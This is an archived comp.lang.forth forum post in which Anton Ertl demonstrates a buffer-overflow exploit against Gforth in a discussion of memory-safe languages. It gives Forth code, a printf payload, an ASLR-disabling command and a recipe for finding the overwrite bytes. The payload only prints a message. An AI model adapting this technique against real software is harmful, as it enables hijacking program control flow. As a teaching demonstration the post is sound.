home bbs files messages ]

Forums before death by AOL, social media and spammers... "We can't have nice things"

   comp.lang.forth      Forth programmers eat a lot of Bratwurst      117,927 messages   

[   << oldest   |   < older   |   list   |   newer >   |   newest >>   ]

   Message 116,246 of 117,927   
   Anton Ertl to Anton Ertl   
   Re: push for memory safe languages -- im   
   02 Mar 24 09:57:01   
   
   From: anton@mips.complang.tuwien.ac.at   
      
   anton@mips.complang.tuwien.ac.at (Anton Ertl) writes:   
   >If you want an example, here's one that targets the Gforth version I   
   >am currently working with:   
   >   
   >: MaliciousCode ( -- )   
   >  ." This code is malicious!" cr   
   >  ." It will not execute normally." cr   
   >  bye ;   
   >   
   >create buffer1 8 allot   
   >   
   >:noname buffer1 96 stdin read-line . ; execute   
   >bye   
   >   
   >When I put this into a file xploit.fs and then perform   
   >   
   >printf "0123456789012345678901234567890123456789012345678901234   
   678901234567890123456789\x33\x5b\x57\x55\x55\x55\x00\x00\x68\xdc   
   xed\xe9\xff\x7f\x00\x00"|   
   >  setarch `uname -m` -R gforth xploit.fs   
   >   
   >I get the following output:   
   >   
   >This code is malicious!   
   >It will not execute normally.   
      
   I forgot to give a recipe for the printf above:   
      
   insert   
      
   ' call -2 cells + 8 dump ' MaliciousCode sp@ 8 dump drop   
      
   right before the execute, and the dumps contain the bytes you have to   
   put into the printf after the 80th byte, in that order.  I.e.:   
      
   : MaliciousCode ( -- )   
     ." This code is malicious!" cr   
     ." It will not execute normally." cr   
     bye ;   
      
   create buffer1 8 allot   
      
   :noname buffer1 96 stdin read-line . ;   
   ' call -2 cells + 8 dump ' MaliciousCode sp@ 8 dump drop   
   execute   
   bye   
      
   and run it with   
      
   echo|setarch `uname -m` -R gforth xploit.fs gforth xploit.fs   
      
   For the particular Gforth at hand, this produces:   
      
   7FFFE9E43160: 33 5B 57 55  55 55 00 00 -                           3[WUUU..   
      
   7FFFE9AF6FF0: 68 DC ED E9  FF 7F 00 00 -                           h.......   
      
   exactly the bytes in the printf above.   
      
   - anton   
   --   
   M. Anton Ertl  http://www.complang.tuwien.ac.at/anton/home.html   
   comp.lang.forth FAQs: http://www.complang.tuwien.ac.at/forth/faq/toc.html   
        New standard: https://forth-standard.org/   
      EuroForth 2023: https://euro.theforth.net/2023   
      
   --- SoupGate-Win32 v1.05   
    * Origin: you cannot sedate... all the things you hate (1:229/2)   

[   << oldest   |   < older   |   list   |   newer >   |   newest >>   ]


(c) 1994,  bbs@darkrealms.ca